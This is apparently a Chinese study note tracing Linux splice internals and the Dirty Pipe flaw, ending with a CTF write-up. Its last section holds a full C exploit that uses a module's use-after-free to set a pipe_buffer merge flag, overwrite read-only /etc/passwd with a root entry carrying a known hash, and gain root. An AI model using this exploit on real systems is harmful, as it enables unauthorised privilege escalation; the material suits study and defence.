`pipe_inode_info` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1299 /* * Determine where to splice to/from. 
*/ ssize_t do_splice(struct file *in, loff_t *off_in, struct file *out, loff_t *off_out, size_t len, unsigned int flags) { struct pipe_inode_info *ipipe; struct pipe_inode_info *opipe; loff_t offset; ssize_t ret; if (unlikely(!(in->f_mode & FMODE_READ) || !(out->f_mode & FMODE_WRITE))) return -EBADF; ipipe = get_pipe_info(in, true); opipe = get_pipe_info(out, true); ``` 接下來是三種 case ### pipe 2 pipe 第一種 pipe 2 pipe 會先確定都沒有指定 offset,以及不是自己複製給自己 之後 call `splice_pipe_to_pipe` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1314 if (ipipe && opipe) { if (off_in || off_out) return -ESPIPE; /* Splicing to self would be fun, but... */ if (ipipe == opipe) return -EINVAL; if ((in->f_flags | out->f_flags) & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; ret = splice_pipe_to_pipe(ipipe, opipe, len, flags); } ``` 去初始化 i/o pipe_buffer、head、tail 等變數後 去 call `ipipe_prep`, 主要用來確保來源 pipe 有資料可讀,如果沒有就依情況等待 (阻塞模式) 或返回錯誤 並避免死鎖狀況 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1715 /* * Splice contents of ipipe to opipe. */ static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe, struct pipe_inode_info *opipe, size_t len, unsigned int flags) { struct pipe_buffer *ibuf, *obuf; unsigned int i_head, o_head; unsigned int i_tail, o_tail; int ret = 0; bool input_wakeup = false; retry: ret = ipipe_prep(ipipe, flags); if (ret) return ret; ret = opipe_prep(opipe, flags); if (ret) return ret; /* * Potential ABBA deadlock, work around it by ordering lock * grabbing by pipe info address. Otherwise two different processes * could deadlock (one doing tee from A -> B, the other from B -> A). 
*/ pipe_double_lock(ipipe, opipe); i_tail = ipipe->tail; o_head = opipe->head; ``` 之後去檢查 readers、writers、對應 pipe 是不是 empty 或 full 狀態 非阻塞跟阻塞 (SPLICE_F_NONBLOCK) 基本上就是會直接跳出還是等待 ```c do { size_t o_len; if (!opipe->readers) { send_sig(SIGPIPE, current, 0); if (!ret) ret = -EPIPE; break; } i_head = ipipe->head; o_tail = opipe->tail; if (pipe_empty(i_head, i_tail) && !ipipe->writers) break; /* * Cannot make any progress, because either the input * pipe is empty or the output pipe is full. */ if (pipe_empty(i_head, i_tail) || pipe_full(o_head, o_tail, opipe->max_usage)) { /* Already processed some buffers, break */ if (ret) break; if (flags & SPLICE_F_NONBLOCK) { ret = -EAGAIN; break; } /* * We raced with another reader/writer and haven't * managed to process any buffers. A zero return * value means EOF, so retry instead. */ pipe_unlock(ipipe); pipe_unlock(opipe); goto retry; } ``` 通過 pipe_buf 拿到對應 pipe tail (in) 跟 head (out) 的 pipe_buffer 如果指定的 len 大於等於 ibuf 的 len,那就直接 copy 整個 struct 過去 之後去清空 ibuf ops、將 in pipe 的 tail 後推 (下一個讀取 pipe_buffer 位置),以及將 out pipe 的 head 後推 (下一個寫入 pipe_buffer 位置) 另外一個就需要部份 copy 不過邏輯差不多 ```c ibuf = pipe_buf(ipipe, i_tail); obuf = pipe_buf(opipe, o_head); if (len >= ibuf->len) { /* * Simply move the whole buffer from ipipe to opipe */ *obuf = *ibuf; ibuf->ops = NULL; i_tail++; ipipe->tail = i_tail; input_wakeup = true; o_len = obuf->len; o_head++; opipe->head = o_head; } else { /* * Get a reference to this pipe buffer, * so we can copy the contents over. */ if (!pipe_buf_get(ipipe, ibuf)) { if (ret == 0) ret = -EFAULT; break; } *obuf = *ibuf; /* * Don't inherit the gift and merge flags, we need to * prevent multiple steals of this page. 
*/ obuf->flags &= ~PIPE_BUF_FLAG_GIFT; obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE; obuf->len = len; ibuf->offset += len; ibuf->len -= len; o_len = len; o_head++; opipe->head = o_head; } ret += o_len; len -= o_len; } while (len); ``` ### pipe 2 file 這部分檢查跟先前邏輯相同 另外會去 call `rw_verify_area` 來驗證檔案的權限 最後 call `do_splice_from` ```c } else if (ipipe) { if (off_in) return -ESPIPE; if (off_out) { if (!(out->f_mode & FMODE_PWRITE)) return -EINVAL; offset = *off_out; } else { offset = out->f_pos; } if (unlikely(out->f_flags & O_APPEND)) return -EINVAL; ret = rw_verify_area(WRITE, out, &offset, len); if (unlikely(ret < 0)) return ret; if (in->f_flags & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; file_start_write(out); ret = do_splice_from(ipipe, out, &offset, len, flags); file_end_write(out); if (!off_out) out->f_pos = offset; else *off_out = offset; ``` 之後去 call out normal file 的 `splice_write` (寫在 file ops [src](https://elixir.bootlin.com/linux/v6.15.9/source/block/fops.c#L900)) splice_write 會 call 到 `iter_file_splice_write` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L930 /* * Attempt to initiate a splice from pipe to file. */ static ssize_t do_splice_from(struct pipe_inode_info *pipe, struct file *out, loff_t *ppos, size_t len, unsigned int flags) { if (unlikely(!out->f_op->splice_write)) return warn_unsupported(out, "write"); return out->f_op->splice_write(pipe, out, ppos, len, flags); } ``` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L648 /** * iter_file_splice_write - splice data from a pipe to a file * @pipe: pipe info (in) * @out: file to write to * @ppos: position in @out * @len: number of bytes to splice * @flags: splice modifier flags * * Description: * Will either move or copy pages (determined by @flags options) from * the given pipe inode to the given file. * This one is ->write_iter-based. 
* */ ssize_t iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out, loff_t *ppos, size_t len, unsigned int flags) { struct splice_desc sd = { .total_len = len, .flags = flags, .pos = *ppos, .u.file = out, }; int nbufs = pipe->max_usage; struct bio_vec *array; ssize_t ret; ``` splice_desc 是用來追蹤 splice 過程的狀態 * total_len:剩下要寫入的資料長度 * num_spliced:已經成功寫入的資料 * pos:檔案偏移位置 * need_wakeup:是否需要喚醒管道的其他等待者 之後去 kcalloc max 數量個 bio_vec 並給 pipe 上鎖 ```c if (!out->f_op->write_iter) return -EINVAL; array = kcalloc(nbufs, sizeof(struct bio_vec), GFP_KERNEL); if (unlikely(!array)) return -ENOMEM; pipe_lock(pipe); ``` struct bio_vec,它是 I/O 子系統用來描述一段連續物理記憶體區間(contiguous physical memory range)的資料結構 * bv_page 指向 page * bv_len 是這個區段的實際長度 * bv_offset 是資料在 bv_page 內的起始位置,資料不是從 page 開頭開始,就用 offset 指定 https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19 ```c /** * struct bio_vec - a contiguous range of physical memory addresses * @bv_page: First page associated with the address range. * @bv_len: Number of bytes in the address range. * @bv_offset: Start of the address range relative to the start of @bv_page. * * The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len: * * nth_page(@bv_page, n) == @bv_page + n * * This holds because page_is_mergeable() checks the above property. */ struct bio_vec { struct page *bv_page; unsigned int bv_len; unsigned int bv_offset; }; ``` 去初始化 sd (計數器跟狀態) ```c splice_from_pipe_begin(&sd); ``` `splice_from_pipe_next` 去確保 pipe 中有資料可以被 splice,並處理等待或非阻塞邏輯 並且這裡也會重新 kcalloc bio_vec:`splice_from_pipe_next` 在等待資料時會暫時放掉 pipe lock,這段期間 pipe 可能被放大 (例如 `fcntl(F_SETPIPE_SZ)`),使一開始依 `max_usage` 分配的陣列不夠用,所以當 `nbufs < pipe->max_usage` 時要重新分配 
```c while (sd.total_len) { struct kiocb kiocb; struct iov_iter from; unsigned int head, tail; size_t left; int n; ret = splice_from_pipe_next(pipe, &sd); if (ret <= 0) break; if (unlikely(nbufs < pipe->max_usage)) { kfree(array); nbufs = pipe->max_usage; array = kcalloc(nbufs, sizeof(struct bio_vec), GFP_KERNEL); if (!array) { ret = -ENOMEM; break; } } ``` 之後根據要轉移的長度,去建立 bio_vec 這邊動態去加 tail 直到與 head 重疊 (讀出所有的資料) 或是讀到指定的大小了 ```c /* build the vector */ left = sd.total_len; for (n = 0; !pipe_empty(head, tail) && left && n < nbufs; tail++) { struct pipe_buffer *buf = pipe_buf(pipe, tail); size_t this_len = buf->len; /* zero-length bvecs are not supported, skip them */ if (!this_len) continue; this_len = min(this_len, left); ret = pipe_buf_confirm(pipe, buf); if (unlikely(ret)) { if (ret == -ENODATA) ret = 0; goto done; } bvec_set_page(&array[n], buf->page, this_len, buf->offset); left -= this_len; n++; } // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L37 /** * bvec_set_page - initialize a bvec based off a struct page * @bv: bvec to initialize * @page: page the bvec should point to * @len: length of the bvec * @offset: offset into the page */ static inline void bvec_set_page(struct bio_vec *bv, struct page *page, unsigned int len, unsigned int offset) { bv->bv_page = page; bv->bv_len = len; bv->bv_offset = offset; } ``` 之後去將 bio_vec 陣列轉成 iov_iter,方便統一呼叫 write_iter 寫入檔案 另外也初始化 kiocb (out 寫入位置的 kiocb) ```c iov_iter_bvec(&from, ITER_SOURCE, array, n, sd.total_len - left); init_sync_kiocb(&kiocb, out); kiocb.ki_pos = sd.pos; ``` 通過 write_iter 來去從 bvec 寫入到 kiocb 之後去更新 splice 當前已經寫入的位置 ```c ret = out->f_op->write_iter(&kiocb, &from); sd.pos = kiocb.ki_pos; ``` 之後動態去調整整個 pipe 狀態跟釋放 ```c if (ret <= 0) break; sd.num_spliced += ret; sd.total_len -= ret; *ppos = sd.pos; /* dismiss the fully eaten buffers, adjust the partial one */ tail = pipe->tail; while (ret) { struct pipe_buffer *buf = pipe_buf(pipe, tail); if (ret >= buf->len) { ret -= buf->len; 
buf->len = 0; pipe_buf_release(pipe, buf); tail++; pipe->tail = tail; if (pipe->files) sd.need_wakeup = true; } else { buf->offset += ret; buf->len -= ret; ret = 0; } } } done: kfree(array); splice_from_pipe_end(pipe, &sd); pipe_unlock(pipe); if (sd.num_spliced) ret = sd.num_spliced; return ret; ``` ### file 2 pipe 與先前驗證差不多 最後 call `splice_file_to_pipe` ```c } else if (opipe) { if (off_out) return -ESPIPE; if (off_in) { if (!(in->f_mode & FMODE_PREAD)) return -EINVAL; offset = *off_in; } else { offset = in->f_pos; } ret = rw_verify_area(READ, in, &offset, len); if (unlikely(ret < 0)) return ret; if (out->f_flags & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; ret = splice_file_to_pipe(in, opipe, &offset, len, flags); if (!off_in) in->f_pos = offset; else *off_in = offset; ``` 首先先上鎖,並確保 out pipe 有足夠空間 之後去 call `do_splice_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L1279 ssize_t splice_file_to_pipe(struct file *in, struct pipe_inode_info *opipe, loff_t *offset, size_t len, unsigned int flags) { ssize_t ret; pipe_lock(opipe); ret = wait_for_space(opipe, flags); if (!ret) ret = do_splice_read(in, offset, opipe, len, flags); pipe_unlock(opipe); if (ret > 0) wakeup_pipe_readers(opipe); return ret; } ``` * in → 來源檔案。 * ppos → 檔案偏移量。 * pipe → 目標 pipe。 * len → 想要讀的 byte 數。 * flags → splice 標誌(如 SPLICE_F_NONBLOCK) 之後去確認傳入檔案有可讀權限 pipe_buf_usage(pipe) → 計算 pipe 目前佔用的 buffer 數。 p_space → pipe 還能容納的 buffer 數。 不能讀超過 pipe 可容納的空間 一般檔案會走 `splice_read` ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/splice.c#L953 /* * Callers already called rw_verify_area() on the entire range. * No need to call it for sub ranges. */ static ssize_t do_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { unsigned int p_space; if (unlikely(!(in->f_mode & FMODE_READ))) return -EBADF; if (!len) return 0; /* Don't try to read more the pipe has space for. 
*/ p_space = pipe->max_usage - pipe_buf_usage(pipe); len = min_t(size_t, len, p_space << PAGE_SHIFT); if (unlikely(len > MAX_RW_COUNT)) len = MAX_RW_COUNT; if (unlikely(!in->f_op->splice_read)) return warn_unsupported(in, "read"); /* * O_DIRECT and DAX don't deal with the pagecache, so we allocate a * buffer, copy into it and splice that into the pipe. */ if ((in->f_flags & O_DIRECT) || IS_DAX(in->f_mapping->host)) return copy_splice_read(in, ppos, pipe, len, flags); return in->f_op->splice_read(in, ppos, pipe, len, flags); } ``` fop 的 `splice_read` 會 call 到 `filemap_splice_read` 看到很多文章說會 call 到 `generic_file_splice_read()` ,但這份 patch 改成了 call `filemap_splice_read` https://lkml.indiana.edu/2305.2/05830.html https://git.sceen.net/linux/linux-stable.git/commit/fs/ufs?h=v5.7-rc7&id=2cb1e08985e3dc59d0a4ebf770a87e3e2410d985 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/fs/read_write.c#L28 const struct file_operations generic_ro_fops = { .llseek = generic_file_llseek, .read_iter = generic_file_read_iter, .mmap = generic_file_readonly_mmap, .splice_read = filemap_splice_read, }; ``` 初始化變數後 去將 in init 到 iocb 內 先計算 pipe 還能放幾頁,再把讀取長度 len 限制在這個可用容量之內 之後去 init folio_batch ```c // https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2939 /** * filemap_splice_read - Splice data from a file's pagecache into a pipe * @in: The file to read from * @ppos: Pointer to the file position to read from * @pipe: The pipe to splice into * @len: The amount to splice * @flags: The SPLICE_F_* flags * * This function gets folios from a file's pagecache and splices them into the * pipe. Readahead will be called as necessary to fill more folios. This may * be used for blockdevs also. * * Return: On success, the number of bytes read will be returned and *@ppos * will be updated if appropriate; 0 will be returned if there is no more data * to be read; -EAGAIN will be returned if the pipe had no space, and some * other negative error code will be returned on error. 
A short read may occur * if the pipe has insufficient space, we reach the end of the data or we hit a * hole. */ ssize_t filemap_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { struct folio_batch fbatch; struct kiocb iocb; size_t total_spliced = 0, used, npages; loff_t isize, end_offset; bool writably_mapped; int i, error = 0; if (unlikely(*ppos >= in->f_mapping->host->i_sb->s_maxbytes)) return 0; init_sync_kiocb(&iocb, in); iocb.ki_pos = *ppos; /* Work out how much data we can actually add into the pipe */ used = pipe_buf_usage(pipe); npages = max_t(ssize_t, pipe->max_usage - used, 0); len = min_t(size_t, len, npages * PAGE_SIZE); folio_batch_init(&fbatch); ``` folio_batch 是一個描述一群 folio 的結構 folio 代表一段連續的 page cache 記憶體 (最少一個 page) ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pagevec.h#L19 /** * struct folio_batch - A collection of folios. * * The folio_batch is used to amortise the cost of retrieving and * operating on a set of folios. The order of folios in the batch may be * significant (eg delete_from_page_cache_batch()). Some users of the * folio_batch store "exceptional" entries in it which can be removed * by calling folio_batch_remove_exceptionals(). */ struct folio_batch { unsigned char nr; unsigned char i; bool percpu_pvec_drained; struct folio *folios[PAGEVEC_SIZE]; }; ``` 設定 iocb.ki_pos,告訴它要從檔案的哪個位置開始取資料 `filemap_get_pages()` 會去檔案的 page cache 把對應 offset 的資料取出,之後將檔案的 pages 填入到 folio_batch 中的 folio ```c do { cond_resched(); if (*ppos >= i_size_read(in->f_mapping->host)) break; iocb.ki_pos = *ppos; error = filemap_get_pages(&iocb, len, &fbatch, true); if (error < 0) break; ``` 這段的重點應該是去從 folio 中讀取資料 (`splice_folio_into_pipe`) ```c /* * i_size must be checked after we know the pages are Uptodate. 
* * Checking i_size after the check allows us to calculate * the correct value for "nr", which means the zero-filled * part of the page is not copied back to userspace (unless * another truncate extends the file - this is desired though). */ isize = i_size_read(in->f_mapping->host); if (unlikely(*ppos >= isize)) break; end_offset = min_t(loff_t, isize, *ppos + len); /* * Once we start copying data, we don't want to be touching any * cachelines that might be contended: */ writably_mapped = mapping_writably_mapped(in->f_mapping); for (i = 0; i < folio_batch_count(&fbatch); i++) { struct folio *folio = fbatch.folios[i]; size_t n; if (folio_pos(folio) >= end_offset) goto out; folio_mark_accessed(folio); /* * If users can be writing to this folio using arbitrary * virtual addresses, take care of potential aliasing * before reading the folio on the kernel side. */ if (writably_mapped) flush_dcache_folio(folio); n = min_t(loff_t, len, isize - *ppos); n = splice_folio_into_pipe(pipe, folio, *ppos, n); if (!n) goto out; len -= n; total_spliced += n; *ppos += n; in->f_ra.prev_pos = *ppos; if (pipe_is_full(pipe)) goto out; } folio_batch_release(&fbatch); } while (len); ``` 稍微釐清一下 file 的資料通過 filemap_get_pages 寫入到 folio_batch 的 folio 中 這裡將 folio 所有的 page 讀出來放到 pipe_buffer 中 就達成了將 file 中的資料 copy 到 pipe 中 (pipe object 與 file object 共用 struct page) 這部分我認為站在 `struct page` 角度來看,就是把 file 轉移到 folio 轉移到 pipe_buffer 中 這部分的 pipe_buffer 通過 `.key = value` 方式會去初始化了 flags 成 0,因此這部分目前沒有 dirty pipe 問題 (或許哪天這裡機制被改或有新的 patch 可以看看有沒有出問題) ```c // https://elixir.bootlin.com/linux/v6.15.9/source/mm/filemap.c#L2909 /* * Splice subpages from a folio into a pipe. 
*/ size_t splice_folio_into_pipe(struct pipe_inode_info *pipe, struct folio *folio, loff_t fpos, size_t size) { struct page *page; size_t spliced = 0, offset = offset_in_folio(folio, fpos); page = folio_page(folio, offset / PAGE_SIZE); size = min(size, folio_size(folio) - offset); offset %= PAGE_SIZE; while (spliced < size && !pipe_is_full(pipe)) { struct pipe_buffer *buf = pipe_head_buf(pipe); size_t part = min_t(size_t, PAGE_SIZE - offset, size - spliced); *buf = (struct pipe_buffer) { .ops = &page_cache_pipe_buf_ops, .page = page, .offset = offset, .len = part, }; folio_get(folio); pipe->head++; page++; spliced += part; offset = 0; } return spliced; } ``` 最後將 folio_batch 釋放掉 ```c out: folio_batch_release(&fbatch); file_accessed(in); return total_spliced ? total_spliced : error; } EXPORT_SYMBOL(filemap_splice_read); ``` 其他值被清空可以跑這個觀察 ```c #include <stdio.h> #include <stddef.h> struct Test_buf { int a; int b; int c; int d; }; int main() { struct Test_buf buf; buf.d = 123; buf = (struct Test_buf){ .a = 42, .b = 99 }; printf("a = %d\n", buf.a); printf("b = %d\n", buf.b); printf("c = %d\n", buf.c); printf("d = %d\n", buf.d); return 0; } ``` ## bio_vec 這邊來細講一下有關 bio_vec (上面只是簡單敘述而已) bio_vec 最基本的結構如下,一個 bio_vec 管理一個 page 一部分或是整個 一群 bio_vec 組成了 bio 用於表示請求的 I/O 段落可能有很多個 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/bvec.h#L19 /** * struct bio_vec - a contiguous range of physical memory addresses * @bv_page: First page associated with the address range. * @bv_len: Number of bytes in the address range. * @bv_offset: Start of the address range relative to the start of @bv_page. * * The following holds for a bvec if n * PAGE_SIZE < bv_offset + bv_len: * * nth_page(@bv_page, n) == @bv_page + n * * This holds because page_is_mergeable() checks the above property. 
*/ struct bio_vec { struct page *bv_page; unsigned int bv_len; unsigned int bv_offset; }; ``` 整個 bio 長如下這樣 一個 bio 代表一次 完整的 block I/O 請求,而每個 bio_vec 是此請求的一個實體記憶體片段 ```c // https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/blk_types.h#L214 /* * main unit of I/O for the block layer and lower layers (ie drivers and * stacking drivers) */ struct bio { struct bio *bi_next; /* request queue link */ struct block_device *bi_bdev; blk_opf_t bi_opf; /* bottom bits REQ_OP, top bits * req_flags. */ unsigned short bi_flags; /* BIO_* below */ unsigned short bi_ioprio; enum rw_hint bi_write_hint; blk_status_t bi_status; atomic_t __bi_remaining; struct bvec_iter bi_iter; union { /* for polled bios: */ blk_qc_t bi_cookie; /* for plugged zoned writes only: */ unsigned int __bi_nr_segments; }; bio_end_io_t *bi_end_io; void *bi_private; #ifdef CONFIG_BLK_CGROUP /* * Represents the association of the css and request_queue for the bio. * If a bio goes direct to device, it will not have a blkg as it will * not have a request_queue associated with it. The reference is put * on release of the bio. */ struct blkcg_gq *bi_blkg; struct bio_issue bi_issue; #ifdef CONFIG_BLK_CGROUP_IOCOST u64 bi_iocost_cost; #endif #endif #ifdef CONFIG_BLK_INLINE_ENCRYPTION struct bio_crypt_ctx *bi_crypt_context; #endif #if defined(CONFIG_BLK_DEV_INTEGRITY) struct bio_integrity_payload *bi_integrity; /* data integrity */ #endif unsigned short bi_vcnt; /* how many bio_vec's */ /* * Everything starting with bi_max_vecs will be preserved by bio_reset() */ unsigned short bi_max_vecs; /* max bvl_vecs we can hold */ atomic_t __bi_cnt; /* pin count */ struct bio_vec *bi_io_vec; /* the actual vec list */ struct bio_set *bi_pool; /* * We can inline a number of vecs at the end of the bio, to avoid * double allocations for a small number of bio_vecs. This member * MUST obviously be kept at the very end of the bio. 
*/ struct bio_vec bi_inline_vecs[]; }; ``` 上面使用 bio_vec 這個結構體,應該是與 pipe_buffer 長相很像 ## folio https://blog.csdn.net/feelabclihu/article/details/131485936 ## Dirty pipe 正如先前所說的 若沒有在 splice file2pipe 的時候去初始化 flags 就會出問題 原因如下 嘗試先隨便用 `write` 寫入東西到 pipe 中,寫入結束後該 pipe_buffer 的 flags 會被設置 `PIPE_BUF_FLAG_CAN_MERGE` 這件事我們先記著 另外來看看 file2pipe file 的 struct page 最後會跟 pipe_buffer 共享 此時思考一件事 如果在 file2pipe 沒有去初始化 flags 會發生甚麼事 那不就會當你去 write 一個 struct page 與 file 共享的 pipe 的時候 因為 `PIPE_BUF_FLAG_CAN_MERGE` 被設置,可以去寫到前一個 page (與 file 共享),也就可以繞過檔案權限檢查,向 read only 的檔案寫入資料 (因為 splice 至少要先從檔案搬 1 byte 進 pipe,之後的 write 只能接在這 1 byte 後面,導致 page 的第一個 byte 無法改動,不過也夠用來提權了) 額外可以參考 https://dirtypipe.cm4all.com/ ## Dirty Pipe challenge https://github.com/r1ru/linux-kernel-exploitation/tree/main/dirty-pipe ### analyze source code 他去創建了一個 `vuln` 的 device 並提供了四個功能的 ioctl ```c static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) { request_t req; long ret; if (copy_from_user(&req, (void *)arg, sizeof(req)) != 0) { return -1; } mutex_lock(&module_lock); switch(cmd) { case CMD_ALLOC: ret = obj_alloc(); break; case CMD_READ: ret = obj_read(req.data, req.size); break; case CMD_WRITE: ret = obj_write(req.data, req.size); break; case CMD_FREE: ret = obj_free(); break; default: ret = -1; break; } mutex_unlock(&module_lock); return ret; } static struct file_operations module_fops = { .unlocked_ioctl = module_ioctl, }; static struct miscdevice vuln_dev = { .minor = MISC_DYNAMIC_MINOR, .name = "vuln", .fops = &module_fops }; static int __init module_initialize(void) { if (misc_register(&vuln_dev) != 0) { return -1; } return 0; } static void __exit module_cleanup(void) { misc_deregister(&vuln_dev); mutex_destroy(&module_lock); } ``` 這部分實現了 ioctl 其中固定會去 kzalloc 一塊 0x400 大小的 object 來用 (kmalloc-1k) 其中 free 的地方沒有去清空 pointer 所以有 UAF ```c #define CMD_ALLOC 0xf000 #define CMD_READ 0xf001 #define CMD_WRITE 0xf002 #define CMD_FREE 0xf003 #define OBJ_SIZE 0x400 typedef struct { size_t size; char *data; } request_t; struct obj { char buf[OBJ_SIZE]; }; 
static struct obj *obj = NULL; static DEFINE_MUTEX(module_lock); static long obj_alloc(void) { if (obj != NULL) { return -1; } obj = kzalloc(sizeof(struct obj), GFP_KERNEL); if (obj == NULL) { return -1; } return 0; } static long obj_read(char *data, size_t size) { if (obj == NULL || size > OBJ_SIZE) { return -1; } if (copy_to_user(data, obj->buf, size) != 0) { return -1; } return 0; } static long obj_write(char *data, size_t size) { if (obj == NULL || size > OBJ_SIZE) { return -1; } if (copy_from_user(obj->buf, data, size) != 0) { return -1; } return 0; } static long obj_free(void) { kfree(obj); return 0; } ``` ### attack 先 alloc 後 free 做一塊 UAF chunk 並去 pipe 來讓 pipe_buffer array 拿到這塊 chunk UAF 接著通過 splice 將 `/etc/passwd` 拼接到 pipe fd 中 (他會跟 pipe_buffer 共用 struct page) 通過 UAF read 將資料讀出來,並修改 flags 的地方把 `PIPE_BUF_FLAG_CAN_MERGE` 打開 就可以通過追加寫入,來寫到這個映射到 read only `/etc/passwd` 的 struct page ,之後用修改後的密碼重新登入 (例如 `su`) 來達到提權 ### exploit ```c #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <time.h> #include <assert.h> #include <stdint.h> #include <sched.h> #include <unistd.h> #include <sys/mman.h> // gcc exploit.c -o exploit --static -masm=intel #define CMD_ALLOC 0xf000 #define CMD_READ 0xf001 #define CMD_WRITE 0xf002 #define CMD_FREE 0xf003 typedef struct { size_t size; char *data; } request_t; int fd; int etcpasswd_fd; void obj_alloc() { request_t req = {}; ioctl(fd, CMD_ALLOC, &req); } void obj_write(size_t size, char* data) { request_t req = { .size = size, .data = data }; ioctl(fd, CMD_WRITE, &req); } void obj_read(size_t size, char* data) { request_t req = { .size = size, .data = data }; ioctl(fd, CMD_READ, &req); } void obj_free() { request_t req = {}; ioctl(fd, CMD_FREE, &req); } void show_zoneinfo() { FILE *fp = fopen("/proc/zoneinfo", "r"); char line[256]; int in_pagesets = 0; int current_cpu = -1; while (fgets(line, sizeof(line), fp)) { if (strstr(line, "pagesets")) { 
in_pagesets = 1; continue; } if (in_pagesets && line[0] != ' ' && line[0] != '\t') { in_pagesets = 0; continue; } if (in_pagesets) { int cpu_id; if (sscanf(line, " cpu: %d", &cpu_id) == 1) { current_cpu = cpu_id; } int count_val; if (sscanf(line, " count: %d", &count_val) == 1 && current_cpu != -1) { printf("CPU %d -> count = %d\n", current_cpu, count_val); } } } fclose(fp); } struct pipe_buffer { void *page; unsigned int offset; unsigned int len; const void *ops; unsigned int flags; unsigned long private; }; #define PIPE_BUF_FLAG_CAN_MERGE 0x10 int main(){ fd = open("/dev/vuln", O_RDONLY); if (fd == -1){ puts("Open /dev/vuln failed"); exit(0); } etcpasswd_fd = open("/etc/passwd", O_RDONLY); if (etcpasswd_fd == -1) { puts("Open /etc/passwd failed"); exit(0); } obj_alloc(); obj_free(); int pipefd[2]; // create pipe let pipe buffer have UAF pipe(pipefd); /* ssize_t splice(int fd_in, off_t *_Nullable off_in, int fd_out, off_t *_Nullable off_out, size_t size, unsigned int flags); */ off64_t offset = 0; splice(etcpasswd_fd, &offset, pipefd[1], NULL, 1, 0); struct pipe_buffer my_evil_pipe_buffer; obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer); printf( "[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n", my_evil_pipe_buffer.page, my_evil_pipe_buffer.offset, my_evil_pipe_buffer.len, my_evil_pipe_buffer.ops, my_evil_pipe_buffer.flags, my_evil_pipe_buffer.private ); /* Overwrite flags and len */ my_evil_pipe_buffer.len = 0; my_evil_pipe_buffer.flags = PIPE_BUF_FLAG_CAN_MERGE; obj_write(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer); obj_read(sizeof(my_evil_pipe_buffer), (char*)&my_evil_pipe_buffer); printf( "[+] .page = %p, .offset = %#x, .len = %#x, .ops = %p, .flags = %#x, .private = %#lx\n", my_evil_pipe_buffer.page, my_evil_pipe_buffer.offset, my_evil_pipe_buffer.len, my_evil_pipe_buffer.ops, my_evil_pipe_buffer.flags, my_evil_pipe_buffer.private ); char payload[] = 
"root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh"; int ret = write(pipefd[1], payload, sizeof(payload)); if (ret == -1) { puts("Failed to write /etc/passwd"); exit(0); } return 0; } /* ~ $ id uid=1000(ctf) gid=1000 groups=1000 ~ $ ./exploit [+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0x1, .ops = 0xffffffff8f215320, .flags = 0, .private = 0 [+] .page = 0xfffffb04000d4c40, .offset = 0, .len = 0, .ops = 0xffffffff8f215320, .flags = 0x10, .private = 0 ~ $ cat /etc/passwd root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh:/home/ctf:/bin/sh ~ $ su Password: / # id uid=0(root) gid=0(root) groups=0(root) */ ``` ## pagejack https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf ## after all 再次感受到 kernel 裡面記憶體 1 bit 改變都會有很大的影響XD ## others https://www.interruptlabs.co.uk/articles/pipe-buffer